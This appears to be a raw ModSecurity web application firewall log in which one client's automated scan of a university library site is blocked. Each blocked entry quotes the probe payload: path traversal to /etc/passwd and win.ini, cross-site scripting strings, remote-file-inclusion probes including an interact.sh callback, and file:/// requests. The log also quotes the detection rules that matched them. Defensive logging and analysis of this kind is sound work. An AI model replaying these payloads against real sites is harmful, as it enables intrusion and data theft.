[Tue Aug 29 11:56:22.586915 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16dsCo-f0AAAq-HZsAAAAT"]
[Tue Aug 29 11:56:23.528000 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22\\x22  found within ARGS:message: <img src=\\x22\\x22 onerror=\\x22alert(1);\\x22>1</img>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/Pacs/login.php"] [unique_id "ZO16d8Co-f0AAArIASsAAAAX"]
[Tue Aug 29 11:56:23.670989 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:searchTerm: x' alert(1) 'x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16d8Co-f0AAAq5@QoAAAAK"]
[Tue Aug 29 11:56:24.818150 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16eMCo-f0AAArIAT0AAAAX"]
[Tue Aug 29 11:56:25.674338 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAAq-Ha0AAAAT"]
[Tue Aug 29 11:56:26.995382 2023] [:error] [pid 2761] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16esCo-f0AAArJXnEAAAAZ"]
[Tue Aug 29 11:56:29.867828 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fcCo-f0AAArLLeoAAAAb"]
[Tue Aug 29 11:56:30.607293 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAqeFo8AAAAx"]
[Tue Aug 29 11:56:30.609650 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAocyjcAAAAR"]
[Tue Aug 29 11:56:33.146176 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_d55188c97d2173c96f7725e2526dababdaac5aa6"): Internal error [hostname "digilibfh.unla.ac.id"] [uri "/embed.js"] [unique_id "ZO16gMCo-f0AAAqsV@MAAAAB"]
[Tue Aug 29 11:56:33.600121 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:a</script><script>alert(/XSS/)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:a</script><script>alert(/XSS/)</script>: a</script><script>alert(/XSS/)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/aa404bb"] [unique_id "ZO16gcCo-f0AAArB12EAAAAV"]
[Tue Aug 29 11:56:34.538264 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:srch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:srch: x\\x22 onmouseover=alert(1) x=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16gsCo-f0AAAqeFqEAAAAx"]
[Tue Aug 29 11:56:36.555947 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:class: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16hMCo-f0AAAoz8LQAAAAS"]
[Tue Aug 29 11:56:36.692889 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/home/get_products"] [unique_id "ZO16hMCo-f0AAAq3bAMAAAAI"]
[Tue Aug 29 11:56:37.536744 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: 16170297</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16hcCo-f0AAAq3bAUAAAAI"]
[Tue Aug 29 11:56:39.640452 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16h8Co-f0AAArIAV4AAAAX"]
[Tue Aug 29 11:56:39.749133 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16h8Co-f0AAArIAWMAAAAX"]
[Tue Aug 29 11:56:39.819874 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16h8Co-f0AAArIAWYAAAAX"]
[Tue Aug 29 11:56:40.535500 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAArIAW0AAAAX"]
[Tue Aug 29 11:56:40.777306 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAArZPy4AAAAC"]
[Tue Aug 29 11:56:42.723164 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAoz8M8AAAAS"]
[Tue Aug 29 11:56:43.527522 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAocym4AAAAR"]
[Tue Aug 29 11:56:43.676777 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAAocynIAAAAR"]
[Tue Aug 29 11:56:44.557223 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAApbUycAAAAh"]
[Tue Aug 29 11:56:45.566577 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:285007/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAoz8NwAAAAS"]
[Tue Aug 29 11:56:46.625761 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:160410/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/ueditor/jsp/controller.jsp"] [unique_id "ZO16jsCo-f0AAAq@sn8AAAAM"]
[Tue Aug 29 11:56:46.726299 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:URLPARAMETER. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:URLPARAMETER: file:///"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/reports/rwservlet"] [unique_id "ZO16jsCo-f0AAAq5@VoAAAAK"]
[Tue Aug 29 11:56:47.625711 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/components/com_ionfiles/download.php"] [unique_id "ZO16j8Co-f0AAAolK6oAAAAe"]
[Tue Aug 29 11:56:47.655424 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/scripts/wa.exe"] [unique_id "ZO16j8Co-f0AAApbU0EAAAAh"]
[Tue Aug 29 11:56:48.623339 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:at. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:at: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/dokuwiki/doku.php"] [unique_id "ZO16kMCo-f0AAAqqtlMAAAAA"]
[Tue Aug 29 11:56:48.775843 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:c: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/scripts/wa-HAP.exe"] [unique_id "ZO16kMCo-f0AAAocypEAAAAR"]
